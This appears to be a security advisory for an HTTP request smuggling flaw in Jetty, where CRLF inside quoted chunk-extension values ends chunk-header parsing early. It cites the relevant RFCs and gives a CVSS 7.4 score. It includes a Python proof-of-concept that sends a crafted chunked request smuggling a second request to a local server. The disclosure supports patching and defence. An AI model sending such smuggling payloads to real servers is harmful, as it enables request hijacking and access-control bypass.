Jetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.
This vulnerability is a new variant discovered while researching the "Funky Chunks" HTTP request smuggling techniques:
The original research tested various chunk extension parsing differentials but did not test quoted-string handling within extension values.
RFC 9112 Section 7.1.1 defines chunked transfer encoding:
chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF
chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] )
chunk-ext-val = token / quoted-string
RFC 9110 Section 5.6.4 defines quoted-string:
quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE
A quoted-string continues until the closing DQUOTE, and \r\n sequences are not permitted within the quotes.
Jetty terminates chunk header parsing at \r\n inside quoted strings instead of treating this as an error.
Expected (RFC compliant):
Chunk: 1;a="value\r\nhere"\r\n
^^^^^^^^^^^^^^^^^^ extension value
Body: [1 byte after the real \r\n]
Actual (jetty):
Chunk: 1;a="value
^^^^^ terminates here (WRONG)
Body: here"... treated as body/next request
#!/usr/bin/env python3
import socket
payload = (
b"POST / HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Transfer-Encoding: chunked\r\n"
b"\r\n"
b'1;a="\r\n'
b"X\r\n"
b"0\r\n"
b"\r\n"
b"GET /smuggled HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Content-Length: 11\r\n"
b"\r\n"
b'"\r\n'
b"Y\r\n"
b"0\r\n"
b"\r\n"
)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)
response = b""
while True:...
10.0.2811.0.2812.0.3312.1.79.4.60Exploitability
AV:NAC:HPR:NUI:NScope
S:UImpact
C:HI:HA:N7.4/CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N